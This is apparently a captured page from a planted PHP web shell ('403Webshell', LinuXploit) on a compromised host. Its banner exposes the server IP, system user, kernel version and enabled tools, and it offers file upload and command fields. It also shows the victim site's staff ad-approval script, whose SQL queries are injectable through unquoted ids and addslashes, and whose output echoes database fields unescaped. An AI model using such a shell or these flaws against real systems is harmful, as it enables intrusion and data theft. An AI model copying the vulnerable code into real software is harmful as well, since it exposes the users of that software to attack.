403Webshell
Server IP : 51.89.169.208  /  Your IP : 3.148.192.32
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/staff/approvals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yellowleaf/public_html/staff/approvals/index.php
<?php
   $path  = $_SERVER['DOCUMENT_ROOT'];
   include_once $path.'/connect_db.php';
   include '../accesscontrol.php';
   
   // ACCEPT AND DECLINE SQL
   $update_sql = ($_POST['accept']?"`active`=1":(
                   $_POST['decline']?"`decline`=1":
                  ''));
   
   if($update_sql){
       $adid= addslashes($_POST['adid']);
       $desc = addslashes($_POST['description']);
       $name = addslashes($_POST['companyname']);
       $email = addslashes($_POST['email']);
       $url = addslashes($_POST['url']);
   
        $update_sql = "UPDATE ads SET description='{$desc}',companyname='{$name}',email='{$email}',url='{$url}',{$update_sql} WHERE adid={$adid}";
       $q = $connect->query($update_sql);
       if($q){
   		echo "<script>location.href='./approvals.php'</script>";exit;
          
       }else{
           die('flop');
       }
   }
   
   //adid=20135 AND
   $a = $connect->query("SELECT * FROM ads WHERE active=0 AND completed='1' AND decline='0' ORDER BY RAND() LIMIT 1") or die($connect->error);
   $r = $a->fetch_assoc();
   echo '<!--',print_r($r),'-->';
   
   //STOPWORDS
   $accept = ' <button name="accept" value="1" class="button green" style="margin-right:20px;">Accept</button>  ';
   $stopwords = explode(',',file_get_contents('stopwords.txt'));
   foreach($stopwords as $stopword){
       if (strpos($r['description'], ' '.$stopword.' ') !== false) {$accept='Stopword: '.$stopword;}
   }
   
   
   
   /* -- CHECKING DEFAULT DETAILS -- */
   $description = iconv("UTF-8","UTF-8//IGNORE",$r['description']);
   // turn all spaces normal
   $description = str_replace('&nbsp;',' ',$description);
   
   
   /* 07 found or @. = preg replace details (telephone/email on request)
   $description = preg_replace('/([\+447||07][0-9]{10,12})/','(available on request)',$description);
   $description = preg_replace('/([a-zA-z\.]+@[a-zA-z]+\.[a-zA-z]+)/','(available on request)',$description); */
   
   // replace single digit nums with word equivalent
   $number_words = array('zero','one','two','three','four','five','six','seven','eight','nine');
   foreach($number_words as $num=>$word){
       $description = preg_replace('#\s('.$num.')\s#',' '.$word.' ',$description);
   }
   
   
   
   // ucfirst sentences
   $description = preg_replace_callback('#&*([A-Za-z0-9\s\/\(\),\-&;\']+)#',
                               function($matches){
                                   foreach($matches as $match){
                                       return ucfirst(($match));
                                   }
                               },$description);
   
   
   // add space after full stop except exceptions CASE SENSITIVE
   $description = str_replace('.','. ',$description);
   $exceptions = array('a.m','..','p.m','e.g');
   foreach($exceptions as $exception){
       $exception2 = str_replace('.','. ',$exception);
       $description = str_ireplace($exception2,$exception,$description);
   }
   
   // remove double/triple punctuation
   $punctuation = array('?','!',' ');
   foreach($punctuation as $p){
       $description = str_replace($p.$p.$p,$p,$description);
       $description = str_replace($p.$p,$p,$description);
   }
   
   // 200k -> 200,000
   $description = preg_replace('/([0-9]+)k/', '$1,000', $description);
   
   // 6yrs -> 6 years
   $description = preg_replace('/([0-9]+)yrs /', '$1 years ', $description);
   
   // word , word -> word, word
   $description = str_replace(' , ',', ',$description);
   
   // replace standard words
   $replacements = array('yrs'=>'years','ono'=>'on nearest offer','pa'=>'per annum','SAV'=>'stock at valuation','uk'=>"UK");
   foreach($replacements as $k=>$v){
       $description = str_ireplace(" $k "," $v ",$description);
       $description = str_ireplace(" $k."," $v.",$description);
       $description = str_ireplace(" $k\n"," $v\n",$description);
   }
   ?>
<!DOCTYPE html>
<html>
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
      <title>YellowLeaf UK</title>
      <link rel="stylesheet" href="/header-footer/global.css">
      <link rel="stylesheet" href="/staff/style_staff.css">
   </head>
   <style>
      .cn{width:980px;margin:auto;}
      label{display:block;margin:20px 0 5px;font-weight:bold}
      input,textarea{display:block;border:1px solid #ccc;border-radius:3px;width:100%;padding:5px;}
      #photos > div{background:#eee;border:1px solid #ccc;border-radius:3px;padding:30px 30px;margin-top:10px;}
      #photos img{max-height:120px;}
      .button {
      background-color: #4CAF50; /* Green */
      border: none;
      color: white;
      padding: 15px 32px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 16px;
      }
      .button.green {background-color: #4CAF50;} /* Green */
      .button.blue {background-color: #008CBA;} /* Blue */
      .button.red {background-color: #f44336;} /* Red */
      .button.gray {background-color: #e7e7e7; color: black;} /* Gray */
      .button.black {background-color: #555555;} /* Black */
   </style>
   <body>
      <? include '../staff_header.php'?>
      <div class="table-section">
         <div class="container lg">
            <div class="cn">
               <form method="POST">
                  <input type="hidden" name="adid" value="<?=$r['adid']?>" />
                  <?=$accept ?>
                  <button type="submit" value="1" name="decline" class="button red">Decline</button>
                  <h1>Ad id <?=$r['adid']?></h1>
                  <section id="photos">
                     <div>
                        <?=($r['image']?'<img itemprop="photo" class="photo" src="/members/uploads/logo/'.$r['image'].'" border="0">':'')?>
                        <?=($r['photo_1']?'<img id="bigP" class="bpic" src="/members/uploads/1/'.$r['photo_1'].'">':'')?>
                        <?=($r['photo_2']?'<img id="bigP" class="bpic" src="/members/uploads/2/'.$r['photo_2'].'">':'')?>
                        <?=($r['photo_3']?'<img id="bigP" class="bpic" src="/members/uploads/3/'.$r['photo_3'].'">':'')?>
                        <?=($r['photo_4']?'<img id="bigP" class="bpic" src="/members/uploads/4/'.$r['photo_4'].'">':'')?>
                     </div>
                  </section>
                  <h2>Details</h2>
                  <label>Company Name: </label><input type="text" name="companyname" value="<?=$r['companyname']?>">
                  <label>Description: </label>
                  <textarea rows="12"  name="description"><?=$description?></textarea>
                  <label>Email: </label><input type="text"  name="email" value="<?=$r['email']?>">
                  <label>Url: </label><input type="text"  name="url" value="<?=$r['url']?>">
                  <a href="//<?=str_replace(['https:','http:'],'',$r['url'])?>" target="_blank">Check Website</a>
               </form>
            </div>
         </div>
      </div>
   </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit